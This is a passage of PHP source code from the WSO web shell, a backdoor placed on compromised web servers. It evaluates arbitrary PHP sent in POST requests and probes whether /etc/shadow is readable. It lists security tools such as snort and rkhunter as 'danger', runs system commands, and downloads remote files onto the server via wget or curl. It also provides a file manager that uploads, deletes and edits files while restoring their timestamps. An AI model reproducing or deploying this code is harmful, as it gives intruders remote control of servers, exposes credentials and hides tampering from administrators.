  638.     wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  639.     wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  640.     $temp=array();
  641.     if(function_exists('mysql_get_client_info'))
  642.         $temp[] = "MySql (".mysql_get_client_info().")";
  643.     if(function_exists('mssql_connect'))
  644.         $temp[] = "MSSQL";
  645.     if(function_exists('pg_connect'))
  646.         $temp[] = "PostgreSQL";
  647.     if(function_exists('oci_connect'))
  648.         $temp[] = "Oracle";
  649.     wsoSecParam('Supported databases', implode(', ', $temp));
  650.     echo '<br>';
  651.  
  652.     if( $GLOBALS['os'] == 'nix' ) {
  653.         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  654.         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  655.         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  656.         wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  657.         wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  658.         wsoSecParam('Syslog', @is_readable('/etc/syslog.conf')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"syslog.conf\")'>[view]</a>":'no');
  659.         wsoSecParam('Fstab', @is_readable('/etc/fstab')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"fstab\")'>[view]</a>":'no');
  660.         wsoSecParam('Cpuinfo', @is_readable('/proc/cpuinfo')?"yes <a href='#' onclick='g(\"FilesTools\", \"/proc/\", \"cpuinfo\")'>[view]</a>":'no');
  661.             
  662.         wsoSecParam('OS version', @file_get_contents('/proc/version'));     echo '<br>';
  663.         wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  664.         if(!$GLOBALS['safe_mode']) {
  665.             echo '<br>';
  666.     
  667.             echo '<br/>';
  668.             wsoSecParam('HDD space', wsoEx('df -h'));
  669.             echo '<br>';
  670.             wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '<br>';
  671.             wsoSecParam('Ifconfig', wsoEx('ifconfig')); echo '<br>';
  672.             wsoSecParam('Uptime', wsoEx('uptime')); echo '<br>';
  673.             wsoSecParam('last 10', wsoEx('last -n 10')); echo '<br>';
  674.             wsoSecParam('Ps -aux', wsoEx('ps -aux')); echo '<br>';
  675.             
  676.             
  677.  
  678.             
  679.         }
  680.     } else {
  681.         wsoSecParam('OS Version',wsoEx('ver'));
  682.         wsoSecParam('Account Settings',wsoEx('net accounts'));
  683.         wsoSecParam('User Accounts',wsoEx('net user'));
  684.     }
  685.     echo '</div>';
  686.     wsoFooter();
  687. }
  688.  
  689. function actionPhp() {
  690.     if( isset($_POST['ajax']) ) {
  691.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  692.         ob_start();
  693.         eval($_POST['p1']);
  694.         $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  695.         echo strlen($temp), "\n", $temp;
  696.         exit;
  697.     }
  698.     wsoHeader();
  699.     if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  700.         echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
  701.         ob_start();
  702.         phpinfo();
  703.         $tmp = ob_get_clean();
  704.         $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  705.         $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  706.         echo str_replace('h1','h2',$tmp).'</div><br>';
  707.     }
  708.     
  709.     
  710.         elseif( isset($_POST['p2']) && ($_POST['p2'] == 'ini') ) {
  711.         echo '<h1>PHP ini</h1><div class=content><style>.p {color:#000;}</style>';
  712.         ob_start();
  713.         //
  714.         
  715.         
  716.         
  717.         
  718.         
  719.         
  720.         
  721.         function U_value($value)
  722.  {
  723.  if ($value == '') return '<i>no value</i>';
  724.  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  725.  if ($value === null) return 'NULL';
  726.  if (@is_object($value)) $value = (array) $value;
  727.  if (@is_array($value))
  728.  {
  729.  @ob_start();
  730.  print_r($value);
  731.  $value = @ob_get_contents();
  732.  @ob_end_clean();
  733.  }
  734.  return U_wordwrap((string) $value);
  735.  }
  736. function U_wordwrap($str)
  737.  {
  738.  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  739.  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  740.  }
  741. if (@function_exists('ini_get_all'))
  742.  {
  743.  $r = '';
  744.  echo '<table width=100% border=1px>', '<tr><td><div align=center><b>Directive</b></div></font></td><td><div align=center><b>Local Value</b></div></td><td><div align=center><b>Master Value</b></div></td></tr>';
  745.  foreach (@ini_get_all() as $key=>$value)
  746.   {
  747.   $r .= '<tr><td>   <b>'.$key.'</b></td><td><div align=center><b>'.U_value($value['local_value']).'</b></div></td><td><div align=center><b>'.U_value($value['global_value']).'</b></div></td></tr>';
  748.   }
  749.  echo $r;
  750.  echo '</table>';
  751.  }
  752.  
  753.         
  754.         
  755.         
  756.         
  757.         
  758.         
  759.         
  760.         
  761.         
  762.         
  763.         
  764.         
  765.         
  766.         
  767.         
  768.         
  769.         
  770.         
  771.         
  772.         
  773.         
  774.         
  775.         
  776.         
  777.         
  778.         
  779.         
  780.         //
  781.         $tmp = ob_get_clean();
  782.         $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  783.         $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  784.         echo str_replace('h1','h2',$tmp).'</div><br>';
  785.     }
  786.     
  787.     
  788.     
  789.     
  790.     
  791.     
  792.     
  793.     
  794.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  795.         @$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  796.         echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
  797.     echo ' <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  798.     if(!empty($_POST['p1'])) {
  799.         ob_start();
  800.         eval($_POST['p1']);
  801.         echo htmlspecialchars(ob_get_clean());
  802.     }
  803.     echo '</pre></div>';
  804.     wsoFooter();
  805. }
  806.  
  807.  
  808.  
  809. function remup() {
  810.  
  811. $tool = $_POST['charset'];
  812. $url = $_POST['p3'];
  813. $place = $_POST['p2'];
  814.  
  815.  switch($tool)
  816.  {
  817.  case wget:
  818.  $cmdup = wsoWhich('wget')." ".$url.' -O '.$place;
  819.  break;
  820.  case fetch:
  821.  $cmdup = wsoWhich('fetch')." -o ".$place." -p ".$url;
  822.  break;
  823.  case lynx:
  824.  $cmdup = wsoWhich('lynx')." -source ".$url." > ".$place."";
  825.  break;
  826.  case links:
  827.  $cmdup = wsoWhich('links')." -source ".$url." > ".$place."";
  828.  break;
  829.  case GET:
  830.  $cmdup = wsoWhich('GET')." ".$url." > ".$place."";
  831.  break;
  832.  case curl:
  833.  $cmdup = wsoWhich('curl')." ".$url." -o ".$place."";
  834.  break;
  835.  }
  836.  
  837. wsoEx($cmdup);
  838.  
  839.  
  840.  
  841.  
  842.  
  843. return 0;
  844. }
  845.  
  846.  
  847.  
  848. function actionFilesMan() {
  849. if($_POST['p1'] != 'edit') wsoHeader();
  850.     //wsoHeader();
  851.     
  852.     echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
  853.     if(!empty($_POST['p1'])) {
  854.         switch($_POST['p1']) {
  855.           case 'edit': 
  856.           $_POST['p1'] = $_POST['f'][0]; 
  857.           $_POST['p2'] = 'edit';  
  858.           $_POST['p3'] = "";
  859.           $_POST['a']  = 'FilesTools';
  860.                actionFilesTools(); exit; break;
  861.         
  862.         
  863.         
  864.             case 'uploadFile':
  865.                 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  866.                     echo "Can't upload file!";
  867.                 break;
  868.             case 'mkdir':
  869.                 if(!@mkdir($_POST['p2']))
  870.                     echo "Can't create new dir";
  871.                 break;
  872.                 case 'rem': 
  873.                 remup(); break;
  874.                 
  875.                 
  876.             case 'delete':
  877.                 function deleteDir($path) {
  878.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  879.                     $dh  = opendir($path);
  880.                     while ( ($item = readdir($dh) ) !== false) {
  881.                         $item = $path.$item;
  882.                         if ( (basename($item) == "..") || (basename($item) == ".") )
  883.                             continue;
  884.                         $type = filetype($item);
  885.                         if ($type == "dir")
  886.                             deleteDir($item);
  887.                         else
  888.                             @unlink($item);
  889.                     }
  890.                     closedir($dh);
  891.                     rmdir($path);
  892.                 }
  893.                 if(is_array(@$_POST['f']))
  894.                     foreach($_POST['f'] as $f) {
  895.                       if($f == '..')
  896.                             continue;
  897.                     
  898.                         $f = urldecode($f);
  899.                         if(is_dir($f))
  900.                             deleteDir($f);
  901.                         else
  902.                             @unlink($f);
  903.                     }
  904.                 break;
  905.             case 'paste':
  906.                 if($_SESSION['act'] == 'copy') {
  907.                     function copy_paste($c,$s,$d){
  908.                         if(is_dir($c.$s)){
  909.                             mkdir($d.$s);
  910.                             $h = @opendir($c.$s);
  911.                             while (($f = @readdir($h)) !== false)
  912.                                 if (($f != ".") and ($f != "..")) {
  913.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  914.                                 }
  915.                         } elseif(is_file($c.$s)) {
  916.                             @copy($c.$s, $d.$s);
  917.                         }
  918.                     }
  919.                     foreach($_SESSION['f'] as $f)
  920.                         copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
  921.                 } elseif($_SESSION['act'] == 'move') {
  922.                     function move_paste($c,$s,$d){
  923.                         if(is_dir($c.$s)){
  924.                             mkdir($d.$s);
  925.                             $h = @opendir($c.$s);
  926.                             while (($f = @readdir($h)) !== false)
  927.                                 if (($f != ".") and ($f != "..")) {
  928.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  929.                                 }
  930.                         } elseif(@is_file($c.$s)) {
  931.                             @copy($c.$s, $d.$s);
  932.                         }
  933.                     }
  934.                     foreach($_SESSION['f'] as $f)
  935.                         @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
  936.                 } elseif($_SESSION['act'] == 'zip') {
  937.                     if(class_exists('ZipArchive')) {
  938.                         $zip = new ZipArchive();
  939.                         if ($zip->open('wso_'.date("Ymd_His").'.zip', (int)@eval('return ZIPARCHIVE::CREATE;'))) {
  940.                             chdir($_SESSION['c']);
  941.                             foreach($_SESSION['f'] as $f) {
  942.                                 if(@is_file($_SESSION['c'].$f))
  943.                                     $zip->addFile($_SESSION['c'].$f, $f);
  944.                                 elseif(@is_dir($_SESSION['c'].$f)) {
  945.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
  946.                                     foreach ($iterator as $key=>$value) {
  947.                                         $zip->addFile(realpath($key), $key);
  948.                                     }
  949.                                 }
  950.                             }
  951.                             chdir($GLOBALS['cwd']);
  952.                             $zip->close();
  953.                         }
  954.                     }
  955.                 } elseif($_SESSION['act'] == 'unzip') {
  956.                     if(class_exists('ZipArchive')) {
  957.                         $zip = new ZipArchive();
  958.                         foreach($_SESSION['f'] as $f) {
  959.                             if($zip->open($_SESSION['c'].$f)) {
  960.                                 $zip->extractTo($GLOBALS['cwd']);
  961.                                 $zip->close();
  962.                             }
  963.                         }
  964.                     }
  965.                     
  966.                     }
  967.                     elseif($_SESSION['act'] == 'tar') {
  968.                     chdir($_SESSION['c']);
  969.                     $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']);
  970.                     wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f']));
  971.                     chdir($GLOBALS['cwd']);
  972.                     
  973.                     
  974.                     
  975.                 }
  976.                 unset($_SESSION['f']);
  977.                 break;
  978.             default:
  979.                 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')||($_POST['p1'] == 'zip')||($_POST['p1'] == 'unzip')) ) {
  980.                     $_SESSION['act'] = @$_POST['p1'];
  981.                     $_SESSION['f'] = @$_POST['f'];
  982.                     foreach($_SESSION['f'] as $k => $f)
  983.                         $_SESSION['f'][$k] = urldecode($f);
  984.                     $_SESSION['c'] = @$_POST['c'];
  985.                 }
  986.                 break;
  987.         }
  988.     }
  989.     $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  990.     if($dirContent === false) {    echo 'Can\'t open this folder!';wsoFooter(); return;    }
  991.     global $sort;
  992.     $sort = array('name', 1);
  993.     if(!empty($_POST['p1'])) {
  994.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  995.             $sort = array($match[1], (int)$match[2]);
  996.     }
  997. echo "<script>
  998.     function sa() {
  999.         for(i=0;i<document.files.elements.length;i++)
  1000.             if(document.files.elements[i].type == 'checkbox')
  1001.                 document.files.elements[i].checked = document.files.elements[0].checked;
  1002.     }
  1003. </script>
  1004. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
  1005. <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Actions</th></tr>";
  1006.     $dirs = $files = array();
  1007.     $n = count($dirContent);
  1008.     for($i=0;$i<$n;$i++) {
  1009.         $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  1010.         $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  1011.         $tmp = array('name' => $dirContent[$i],
  1012.                      'path' => $GLOBALS['cwd'].$dirContent[$i],
  1013.                      'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  1014.                      'perms' => wsoPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  1015.                      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  1016.                      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  1017.                      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  1018.                     );
  1019.         if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  1020.             $files[] = array_merge($tmp, array('type' => 'file'));
  1021.         elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  1022.             $dirs[] = array_merge($tmp, array('type' => 'link'));
  1023.         elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  1024.             $dirs[] = array_merge($tmp, array('type' => 'dir'));
  1025.     }
  1026.     $GLOBALS['sort'] = $sort;
  1027.     function wsoCmp($a, $b) {
  1028.         if($GLOBALS['sort'][0] != 'size')
  1029.             return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  1030.         else
  1031.             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  1032.     }
  1033.     usort($files, "wsoCmp");
  1034.     usort($dirs, "wsoCmp");
  1035.     $files = array_merge($dirs, $files);
  1036.     $l = 1;
  1037.     foreach($files as $f) {
  1038.         echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'].'</a></td><td>'.$f['owner'].'/'.$f['group'].'</td><td>'.$f['modify']
  1039.             .'</a></td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  1040.         $l = $l?0:1;
  1041.     }
  1042.     
  1043.     
  1044.     echo '</table><br>';
  1045.     echo "
  1046.     <input type=hidden name=a value='FilesMan'>
  1047.     <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
  1048.     <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
  1049.     <select name='p1'><option value='edit'>Edit</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
  1050.     if(class_exists('ZipArchive'))
  1051.         echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
  1052.     if(!empty($_SESSION['act'])&&@count($_SESSION['f']))
  1053.         echo "<option value='paste'>Paste / zip</option>";
  1054.     echo "</select> <input type='submit' value='>>'></form></div>";
  1055.     wsoFooter();
  1056.     
  1057. }
  1058.  
  1059. function actionStringTools() {
  1060.     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  1061.     if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
  1062.     if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  1063.     if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
  1064.     if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  1065.     $stringTools = array(
  1066.         'Base64 encode' => 'base64_encode',
  1067.         'Base64 decode' => 'base64_decode',
  1068.         'Url encode' => 'urlencode',
  1069.         'Url decode' => 'urldecode',
  1070.         'Full urlencode' => 'full_urlencode',
  1071.         'md5 hash' => 'md5',
  1072.         'sha1 hash' => 'sha1',
  1073.         'crypt' => 'crypt',
  1074.         'CRC32' => 'crc32',
  1075.         'ASCII to HEX' => 'ascii2hex',
  1076.         'HEX to ASCII' => 'hex2ascii',
  1077.         'HEX to DEC' => 'hexdec',
  1078.         'HEX to BIN' => 'hex2bin',
  1079.         'DEC to HEX' => 'dechex',
  1080.         'DEC to BIN' => 'decbin',
  1081.         'BIN to HEX' => 'binhex',
  1082.         'BIN to DEC' => 'bindec',
  1083.         'String to lower case' => 'strtolower',
  1084.         'String to upper case' => 'strtoupper',
  1085.         'Htmlspecialchars' => 'htmlspecialchars',
  1086.         'String length' => 'strlen',
  1087.     );
  1088.     if(isset($_POST['ajax'])) {
  1089.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  1090.         ob_start();
  1091.         if(in_array($_POST['p1'], $stringTools))
  1092.             echo $_POST['p1']($_POST['p2']);
  1093.         $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  1094.         echo strlen($temp), "\n", $temp;
  1095.         exit;
  1096.     }
  1097.     wsoHeader();
  1098.     echo '<h1>String conversions</h1><div class=content>';
  1099.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  1100.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  1101.     echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  1102.     foreach($stringTools as $k => $v)
  1103.         echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  1104.         echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  1105.     if(!empty($_POST['p1'])) {
  1106.         if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
  1107.     }
  1108.     echo"</pre></div><br><h1>Search text in files:</h1><div class=content>
  1109.         <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
  1110.             <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
  1111.             <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
  1112.             <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
  1113.             <tr><td></td><td><input type='submit' value='>>'></td></tr>
  1114.             </table></form>";
  1115.  
  1116.     function wsoRecursiveGlob($path) {
  1117.         if(substr($path, -1) != '/')
  1118.             $path.='/';
  1119.         $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
  1120.         if(is_array($paths)&&@count($paths)) {
  1121.             foreach($paths as $item) {
  1122.                 if(@is_dir($item)){
  1123.                     if($path!=$item)
  1124.                         wsoRecursiveGlob($item);
  1125.                 } else {
  1126.                     if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false)
  1127.                         echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
  1128.                 }
  1129.             }
  1130.         }
  1131.     }
  1132.     if(@$_POST['p3'])
  1133.         wsoRecursiveGlob($_POST['c']);
  1134.     echo "</div><br><h1>Search for hash:</h1><div class=content>
  1135.         <form method='post' target='_blank' name='hf'>
  1136.             <input type='text' name='hash' style='width:200px;'><br>
  1137.             <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
  1138.             <input type=hidden name=__EVENTTARGET value=Button1>
  1139.             <input type=hidden name=ctl00\$ContentPlaceHolder1\$Button1 value=╚±Ωα≥ⁿ>
  1140.             <input type=hidden name=ctl00\$ContentPlaceHolder1\$InputHashType value=md5>
  1141.             <input type=hidden name=ctl00\$ContentPlaceHolder1\$TextBoxq>";
  1142.             
  1143.             echo "
  1144.             <input type='button' value='cmd5.ru' onclick=\"document.hf.action='http://cmd5.ru/';document.hf.submit()\"><br>
  1145.             <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
  1146.             <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
  1147.             <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
  1148.         </form></div>";
  1149.     wsoFooter();
  1150. }
  1151.  
  1152. function actionFilesTools() {
  1153.     if( isset($_POST['p1']) )
  1154.         $_POST['p1'] = urldecode($_POST['p1']);
  1155.     if(@$_POST['p2']=='download') {
  1156.         if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
  1157.             ob_start("ob_gzhandler", 4096);
  1158.             header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  1159.             if (function_exists("mime_content_type")) {
  1160.                 $type = @mime_content_type($_POST['p1']);
  1161.                 header("Content-Type: ".$type);
  1162.             }
  1163.             $fp = @fopen($_POST['p1'], "r");
  1164.             if($fp) {
  1165.                 while(!@feof($fp))
  1166.                     echo @fread($fp, 1024);
  1167.                 fclose($fp);
  1168.             }
  1169.         }exit;
  1170.     }
  1171.     if( @$_POST['p2'] == 'mkfile' ) {
  1172.         if(!file_exists($_POST['p1'])) {
  1173.             $fp = @fopen($_POST['p1'], 'w');
  1174.             if($fp) {
  1175.                 $_POST['p2'] = "edit";
  1176.                 fclose($fp);
  1177.             }
  1178.         }
  1179.     }
  1180.     wsoHeader();
  1181.     echo '<h1>File tools</h1><div class=content>';
  1182.     if( !file_exists(@$_POST['p1']) ) {
  1183.         echo 'File not exists';
  1184.         wsoFooter();
  1185.         return;
  1186.     }
  1187.     $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  1188.     if(!$uid) {
  1189.         $uid['name'] = @fileowner($_POST['p1']);
  1190.         $gid['name'] = @filegroup($_POST['p1']);
  1191.     } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
  1192.     echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <br><span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <br><span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  1193.     echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <br><span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <br><span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  1194.     if( empty($_POST['p2']) ) {
  1195.      $_POST['p2'] = 'view';
  1196.                }
  1197.                if($_POST['p2'] == 'view') {
  1198.               if(preg_match('#\.php$#',@basename($_POST['p1']))) { $_POST['p2'] = 'highlight'; }
  1199.     }
  1200.     if( is_file($_POST['p1']) )
  1201.         $m = array('View', 'highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  1202.     else
  1203.         $m = array('Chmod', 'Rename', 'Touch');
  1204.     foreach($m as $v)
  1205.     
  1206.         echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  1207.     echo '<br><br>';
  1208.     
  1209.     switch($_POST['p2']) {
  1210.         case 'view':
  1211.             echo '<pre class=ml1>';
  1212.             $fp = @fopen($_POST['p1'], 'r');
  1213.             if($fp) {
  1214.                 while( !@feof($fp) )
  1215.                     echo htmlspecialchars(@fread($fp, 1024));
  1216.                 @fclose($fp);
  1217.             }
  1218.             echo '</pre>';
  1219.             break;
  1220.         case 'highlight':
  1221.         
  1222.             if( @is_readable($_POST['p1']) ) {
  1223.                 echo '<div class=ml1 style="background-color:white;color:black;">';
  1224.                 $code = @highlight_file($_POST['p1'],true);
  1225.                 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  1226.             }
  1227.             break;
  1228.         case 'chmod':
  1229.             if( !empty($_POST['p3']) ) {
  1230.                 $perms = 0;
  1231.                 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  1232.                     $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  1233.                 if(!@chmod($_POST['p1'], $perms))
  1234.                     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  1235.             }
  1236.             clearstatcache();
  1237.             echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  1238.             break;
  1239.         case 'edit':
  1240.     
  1241.             if( !is_writable($_POST['p1'])) {
  1242.                 echo 'File isn\'t writeable';
  1243.                 break;
  1244.             }
  1245.             if( !empty($_POST['p3']) ) {
  1246.                 $time = @filemtime($_POST['p1']);
  1247.                 $_POST['p3'] = substr($_POST['p3'],1);
  1248.                 $fp = @fopen($_POST['p1'],"w");
  1249.                 if($fp) {
  1250.                     @fwrite($fp,$_POST['p3']);
  1251.                     @fclose($fp);
  1252.                     echo 'Saved!<br><script>p3_="";</script>';
  1253.                     @touch($_POST['p1'],$time,$time);
  1254.                 }
  1255.             }
  1256.             echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
  1257.             $fp = @fopen($_POST['p1'], 'r');
  1258.             if($fp) {
  1259.                 while( !@feof($fp) )
  1260.                     echo htmlspecialchars(@fread($fp, 1024));
  1261.                 @fclose($fp);
  1262.             }
  1263.             echo '</textarea><input type=submit value=">>"></form>';
  1264.             break;
